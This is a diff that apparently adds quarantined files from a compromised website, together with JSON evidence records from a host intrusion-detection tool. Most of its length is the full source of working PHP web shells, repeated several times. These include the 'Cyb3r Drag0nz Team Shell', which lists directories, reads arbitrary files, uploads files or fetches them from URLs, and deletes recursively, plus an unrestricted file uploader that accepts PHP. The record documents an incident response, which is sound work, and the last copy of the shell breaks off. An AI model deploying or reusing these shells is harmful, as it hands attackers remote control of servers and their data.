{ + echo "Maaf, file terlalu besar (maks 10MB)."; + $uploadOk = 0; + } + + if ($uploadOk == 1) { + // Buat folder jika belum ada + if (!is_dir($target_dir)) { + mkdir($target_dir, 0755, true); + } + + // Pindahkan file (terima SEMUA jenis file) + if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) { + echo "✅ File berhasil diupload: " . htmlspecialchars(basename($_FILES["file"]["name"])); + echo "

"; + echo "Path: " . htmlspecialchars($target_file); + echo "

"; + echo "🔗 Akses File"; + } else { + echo "❌ Maaf, terjadi kesalahan saat upload."; + } + } +} else { +?> + + + + + File Uploader + + + +
+

📤 File Uploader

+
+ +
+ +
+
+ Info:
+ ✅ Semua jenis file diterima (PHP, JPG, TXT, dll)
+ ✅ Maks ukuran: 10MB
+ ✅ File akan disimpan di folder: uploads/ +
+
+ + + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/cbdjs.json.evidence.json b/var/www/hosting/archlinexp.eu/www/cbdjs.json.evidence.json new file mode 100644 index 0000000..b3b3699 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cbdjs.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4899", + "log_excerpt": "[quarantine] www.archlinexp.eu:cbdjs.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cbdjs.json)", + "original_sha256": "43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a", + "original_stat": { + "gid": 30037, + "mtime": 1783853928, + "size": 2853, + "uid": 20043 + }, + "rel_path": "cbdjs.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..f2a9f7d --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5293", + "log_excerpt": "[quarantine] www.archlinexp.eu:components/com_content/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353227, + "size": 10657, + "uid": 20043 + }, + "rel_path": "components/com_content/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..87cd327 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5292", + "log_excerpt": "[quarantine] www.archlinexp.eu:components/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353226, + "size": 10657, + "uid": 20043 + }, + "rel_path": "components/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/cyberdjs.json b/var/www/hosting/archlinexp.eu/www/cyberdjs.json new file mode 100644 index 0000000..d52d8d7 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cyberdjs.json @@ -0,0 +1,101 @@ + 10000000) { + echo "Maaf, file terlalu besar (maks 10MB)."; + $uploadOk = 0; + } + + if ($uploadOk == 1) { + // Buat folder jika belum ada + if (!is_dir($target_dir)) { + mkdir($target_dir, 0755, true); + } + + // Pindahkan file (terima SEMUA jenis file) + if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) { + echo "✅ File berhasil diupload: " . htmlspecialchars(basename($_FILES["file"]["name"])); + echo "

"; + echo "Path: " . htmlspecialchars($target_file); + echo "

"; + echo "🔗 Akses File"; + } else { + echo "❌ Maaf, terjadi kesalahan saat upload."; + } + } +} else { +?> + + + + + File Uploader + + + +
+

📤 File Uploader

+
+ +
+ +
+
+ Info:
+ ✅ Semua jenis file diterima (PHP, JPG, TXT, dll)
+ ✅ Maks ukuran: 10MB
+ ✅ File akan disimpan di folder: uploads/ +
+
+ + + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/cyberdjs.json.evidence.json b/var/www/hosting/archlinexp.eu/www/cyberdjs.json.evidence.json new file mode 100644 index 0000000..8e3ebce --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cyberdjs.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4853", + "log_excerpt": "[quarantine] www.archlinexp.eu:cyberdjs.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cyberdjs.json)", + "original_sha256": "43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a", + "original_stat": { + "gid": 30037, + "mtime": 1783853429, + "size": 2853, + "uid": 20043 + }, + "rel_path": "cyberdjs.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..2d65489 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4867", + "log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353213, + "size": 10657, + "uid": 20043 + }, + "rel_path": "f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json.evidence.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json.evidence.json new file mode 100644 index 0000000..0fe73b5 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4845", + "log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353215, + "size": 10657, + "uid": 20043 + }, + "rel_path": "f46vc3nzn1qw.php5.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json.evidence.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json.evidence.json new file mode 100644 index 0000000..6bfed56 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4918", + "log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.php7.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353216, + "size": 10657, + "uid": 20043 + }, + "rel_path": "f46vc3nzn1qw.php7.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
